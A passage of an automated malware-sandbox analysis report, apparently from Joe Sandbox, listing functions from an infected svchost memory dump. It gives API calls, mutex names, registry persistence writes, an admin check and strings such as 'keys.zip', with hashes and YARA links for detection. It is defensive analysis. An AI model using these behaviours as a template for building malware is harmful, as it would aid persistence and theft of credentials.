                                                                                                                                                                                                                    • Sleep.KERNEL32(00009C40,7f1bfc59,ALPHA), ref: 02C8A380
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 02C8A386
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                                    • String ID: 7f1bfc59$ALPHA$Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}$P0#v
                                                                                                                                                                                                                    • API String ID: 4280258085-526467187
                                                                                                                                                                                                                    • Opcode ID: 56509b74c6a8bd65782f25c8cdc6524378e1c8250c8e0cafd1e46b402914a402
                                                                                                                                                                                                                    • Instruction ID: de14a1f6760cce9f69a8307fc09907b038dd5766c2de6a09dfb1e88f9bf87ab6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 56509b74c6a8bd65782f25c8cdc6524378e1c8250c8e0cafd1e46b402914a402
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FCF0A7319C47906AF7237B619C0EB5A77DC7F89B19F008519F94A93180D7B4C5048B67
                                                                                                                                                                                                                    Function 02C918E8 Relevance: 17.5, APIs: 6, Strings: 4, Instructions: 30sleepsynchronizationCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}), ref: 02C918FC
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C91905
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C91919
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C9192B
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BF8F3), ref: 02C91936
                                                                                                                                                                                                                    • Sleep.KERNEL32(00009C40,7F1BF8F3,RFK), ref: 02C91950
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 02C91956
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                                    • String ID: 7F1BF8F3$Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}$P0#v$RFK
                                                                                                                                                                                                                    • API String ID: 4280258085-2405295479
                                                                                                                                                                                                                    • Opcode ID: 59fd6f27f024c97c3d4b3c5c65fd53a019be3320f394cd28f30a889e5203a073
                                                                                                                                                                                                                    • Instruction ID: 004c4aa86e14d2b73aa9941bbbb29204516ae7021b9d9f6747053e188e05d585
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 59fd6f27f024c97c3d4b3c5c65fd53a019be3320f394cd28f30a889e5203a073
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 14F082309C83926EF6225B619C2EF5E37DD6F45B09F098568F90AA2140D7F081158B67
                                                                                                                                                                                                                    Function 02C8E8A8 Relevance: 17.5, APIs: 6, Strings: 4, Instructions: 30sleepsynchronizationCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}), ref: 02C8E8BC
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C8E8C5
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C8E8D9
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C8E8EB
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bfde3), ref: 02C8E8F6
                                                                                                                                                                                                                    • Sleep.KERNEL32(00009C40,7f1bfde3,HANDY), ref: 02C8E910
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 02C8E916
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                                    • String ID: 7f1bfde3$HANDY$Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}$P0#v
                                                                                                                                                                                                                    • API String ID: 4280258085-2479272528
                                                                                                                                                                                                                    • Opcode ID: deaa33791bc182a5584ac62cb4e4d078027aac3b219e4b57aba420f13a913a9e
                                                                                                                                                                                                                    • Instruction ID: 50f4a4625df6a55b3e4d748a1960cbe6f7a8e024a5b950663cb031bbaddc7270
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: deaa33791bc182a5584ac62cb4e4d078027aac3b219e4b57aba420f13a913a9e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BEF082309C43516AF362AB608C0EB5E37DC6F49B0DF048554F906A2081DBB481108B6B
                                                                                                                                                                                                                    Function 02C7F0C0 Relevance: 16.6, APIs: 11, Instructions: 115memorynetworkCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C7F114
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 02C7F12C
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C7F12F
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 02C7F13C
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C7F13F
                                                                                                                                                                                                                    • InternetQueryOptionA.WININET(?,00000022,00000000,-02CBD804), ref: 02C7F15C
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000014), ref: 02C7F179
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 02C7F180
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C7F190
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C7F1D5
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,?,?,00000000,?), ref: 02C7F1E9
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Processmemset$AllocFreeInternetOptionQueryValidatememcpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3911349929-0
                                                                                                                                                                                                                    • Opcode ID: 3b47ffc03df7bccae93ebc883bf1e46a15468ce7319b93bfc744b909056eae01
                                                                                                                                                                                                                    • Instruction ID: 7350d4f0af38a8bac6b638da8aa0a5de28e76fc12fb81255f84488d85783ebeb
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3b47ffc03df7bccae93ebc883bf1e46a15468ce7319b93bfc744b909056eae01
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C1418E72A40305AFDB21DFA8DC84F5AB7F8EF84710F008959E94697680DB71EA14CBE0
                                                                                                                                                                                                                    Function 02C7E2E0 Relevance: 16.5, APIs: 13, Instructions: 218memoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,-0597B008,00000000,00000000,?,?,?,?), ref: 02C7E324
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 02C7E32B
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C7E33B
                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,?,00000000,00000000,?), ref: 02C7E346
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(?,00000000,00000000,?,?,02CB36B4,?,02CB3DE4,-0597B008,00000000,00000000,?), ref: 02C7E40E
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C7E415
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(?,00000000), ref: 02C7E421
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C7E428
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,?,?,?,?,?,02CB3DE4,-0597B008,00000000,00000000,?), ref: 02C7E44E
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,-0597B008,00000000,00000000,?,?,?,?), ref: 02C7E47A
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C7E47D
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C7E48A
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C7E48D
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Process$FreeValidatememcpy$Allocmemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1948005343-0
                                                                                                                                                                                                                    • Opcode ID: a40c66fdaf0112aab8bbe067be471c51554bc826174dd919857f03d9f0225b0f
                                                                                                                                                                                                                    • Instruction ID: 81e6e9af924028ffee4f43b75ffaa7436fad0c47c8715583036e619129a02199
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a40c66fdaf0112aab8bbe067be471c51554bc826174dd919857f03d9f0225b0f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5261A673B002199BDB11DF99D884AAAB7A9FF88714F0486A5FD0997340D771EE11CBE0
                                                                                                                                                                                                                    Function 02C76B50 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 124registrymemoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C76B83
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C76B9B
                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000101,?,?,?,?,?,?,7622F380), ref: 02C76BBC
                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,00000104,00000000,00000001,?,00000104,?,?,?,?,?,7622F380), ref: 02C76BE2
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,7622F380), ref: 02C76C6D
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,7622F380), ref: 02C76C74
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C76C83
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,7622F380), ref: 02C76CB3
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                    • String ID: software\microsoft
                                                                                                                                                                                                                    • API String ID: 4158279268-3673152959
                                                                                                                                                                                                                    • Opcode ID: 90201f7ca9359d800aed87972a28eb2b708b985beff4ee246ce9ad195b8c8ef2
                                                                                                                                                                                                                    • Instruction ID: f00bfaf2064b4f9c923215d3669394f2093518c029f08b413f135ced1ddba1f1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 90201f7ca9359d800aed87972a28eb2b708b985beff4ee246ce9ad195b8c8ef2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 77410571E4055DAFEB15DB749C88AEAB7ADEF98304F1045A8E549D7140E3708F498BA0
                                                                                                                                                                                                                    Function 02C76E70 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 104registryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C76E92
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C76EB0
                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(02C84ADF,software\microsoft,00000000,00000102,80000002,?,?,?,?,00000000,0000000A), ref: 02C76F4D
                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(80000002,80f5007ca,00000000,00000001,?,00000104,?,?,?,?,00000000,0000000A), ref: 02C76F6F
                                                                                                                                                                                                                    • RegDeleteValueA.ADVAPI32(80000002,80f5007ca,?,?,?,?,00000000,0000000A), ref: 02C76F7C
                                                                                                                                                                                                                    • RegFlushKey.ADVAPI32(80000002,?,?,?,?,00000000,0000000A), ref: 02C76F8A
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(80000002,?,?,?,?,00000000,0000000A), ref: 02C76F9F
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Valuememset$CloseDeleteFlushOpen
                                                                                                                                                                                                                    • String ID: 80f5007ca$software\microsoft
                                                                                                                                                                                                                    • API String ID: 3377232977-1722485806
                                                                                                                                                                                                                    • Opcode ID: 9d76e9c25529614b7cb61f11b469bd952ee227bccdab77d5b8f0f35b43d2b7e0
                                                                                                                                                                                                                    • Instruction ID: 3d5aa9a02ba86b7cd17a48e747e0ce21684cc2f9c1aa38b4cea9df250a4d612e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9d76e9c25529614b7cb61f11b469bd952ee227bccdab77d5b8f0f35b43d2b7e0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C31F671A40298AFDB24DB64DC88FEE77BDEF55304F1046A8E586D7140D2B19E848B90
                                                                                                                                                                                                                    Function 02C90E10 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BF8F3), ref: 02C90E37
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000,?,?), ref: 02C90E77
                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?), ref: 02C90E81
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C90E89
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C90E9A
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?), ref: 02C90EA1
                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNEL32(?,?,?), ref: 02C90EAE
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: DirectoryErrorLastPath$AdminBackslashCreateCurrentFolderMakeSystemUser
                                                                                                                                                                                                                    • String ID: 7F1BF8F3$keys.zip
                                                                                                                                                                                                                    • API String ID: 4256651433-778259038
                                                                                                                                                                                                                    • Opcode ID: 4f76909a773524a01a82abfe46ab60e592bd71a00c7721c696f8db1a2e800bef
                                                                                                                                                                                                                    • Instruction ID: 606814422c2f5eaec286f51e3f7223c683517c8e062afb5d9dc1b2dbc34f0057
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f76909a773524a01a82abfe46ab60e592bd71a00c7721c696f8db1a2e800bef
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DF21F8759401D58FCB168B34A96CBE77BEDAF85301F1486D4E9C9CB200DB70C955CBA0
                                                                                                                                                                                                                    Function 02C823A0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 39registryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C823A7
                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 02C823B9
                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(user!226533!1CE3AAD1,software\microsoft,00000000,00000102,02C84A6F,?,02C84A6F), ref: 02C823D3
                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(02C84A6F,80F50315a,00000000,00000004,00000004,00000004,02C84A6F), ref: 02C823F0
                                                                                                                                                                                                                    • RegFlushKey.ADVAPI32(?), ref: 02C823FA
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 02C82404
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AdminCloseCountFlushOpenTickUserValue
                                                                                                                                                                                                                    • String ID: 80F50315a$user!226533!1CE3AAD1$software\microsoft
                                                                                                                                                                                                                    • API String ID: 287100044-224011205
                                                                                                                                                                                                                    • Opcode ID: 8f6cdfb92d119de1b8484a46a2feac68937d8403caffc9ce92df36176a82f031
                                                                                                                                                                                                                    • Instruction ID: 3b1379d1164551cb229a6ca7f0a1ba3dadd87f54f5e1a5cc4ea733abf2b871cf
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8f6cdfb92d119de1b8484a46a2feac68937d8403caffc9ce92df36176a82f031
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 60F03C79D80258FBE701DBA0AC4AF9A773CAF04601F104695FE06A3180D670AA159BA5
                                                                                                                                                                                                                    Function 02C7EB10 Relevance: 15.3, APIs: 7, Strings: 3, Instructions: 271COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000000), ref: 02C7EBEA
                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,?,?,?,?,00001100,?,?,?,?,?,?,?,?,?), ref: 02C7EC9A
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C7ECB6
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?), ref: 02C7ECC5
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,Content-Length,?), ref: 02C7ED1C
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 02C7ED3D
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?), ref: 02C7EDBF
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$_snprintf
                                                                                                                                                                                                                    • String ID: 0$%x$Content-Length
                                                                                                                                                                                                                    • API String ID: 4125937431-3838797520
                                                                                                                                                                                                                    • Opcode ID: 33af21bc4f9b3d582628b9cae9a83cdf2460a5ddc0ce9f7ac8dce1af683e3ede
                                                                                                                                                                                                                    • Instruction ID: 52476407a82d41700fb536315d3cc800fccaa62d03a276dfe78a9bb67cd9490d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 33af21bc4f9b3d582628b9cae9a83cdf2460a5ddc0ce9f7ac8dce1af683e3ede
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 87916FB2600746AFC714DF68D88496AB7E9FF98314F048B69F82987644E770E914CBE1
                                                                                                                                                                                                                    Function 02C97B50 Relevance: 15.1, APIs: 10, Instructions: 97memoryfileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00004070,?,00000000,75AF5CE0,?,02C82840,?), ref: 02C97B63
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,02C82840,?), ref: 02C97B66
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C97B7B
                                                                                                                                                                                                                    • CreateFileA.KERNEL32(02C82840,40000000,00000003,00000000,00000002,00000080,00000000,?,02C82840,?), ref: 02C97BD2
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,02C82840,?), ref: 02C97BF5
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000,?,02C82840,?), ref: 02C97BF8
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,02C82840,?), ref: 02C97C04
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,02C82840,?), ref: 02C97C07
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000010,?,02C82840,?), ref: 02C97C1A
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,02C82840,?), ref: 02C97C1D
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Process$Alloc$CreateFileFreeValidatememset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 604365451-0
                                                                                                                                                                                                                    • Opcode ID: f9ec8668f9f27af3536a84382f41d06f747a31da70293c8ab9c2a57ac8ed06ec
                                                                                                                                                                                                                    • Instruction ID: a6b2414cb3c24528592f7f4772f15661689a7160a35fdfdeb1d03fa4dc6205d6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f9ec8668f9f27af3536a84382f41d06f747a31da70293c8ab9c2a57ac8ed06ec
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E9315EF19467449FDB319F669C88B12FBE8FF84714F00892EE28A97641C370A544CBA1
                                                                                                                                                                                                                    Function 02C750D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 110synchronizationCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C75110
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C7513C
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C75163
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C75184
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(000002C4,000003E8), ref: 02C751B4
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(000002C4), ref: 02C751D5
                                                                                                                                                                                                                    • SetLastError.KERNEL32(?), ref: 02C751EE
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: QueryVirtual$ErrorLast$MutexObjectReleaseSingleWait
                                                                                                                                                                                                                    • String ID: P0#v
                                                                                                                                                                                                                    • API String ID: 2971961948-3387790918
                                                                                                                                                                                                                    • Opcode ID: 70f9fc3143bf534cca684f0e4e89fc85c5a61feea77cab146b802c1c70a26e28
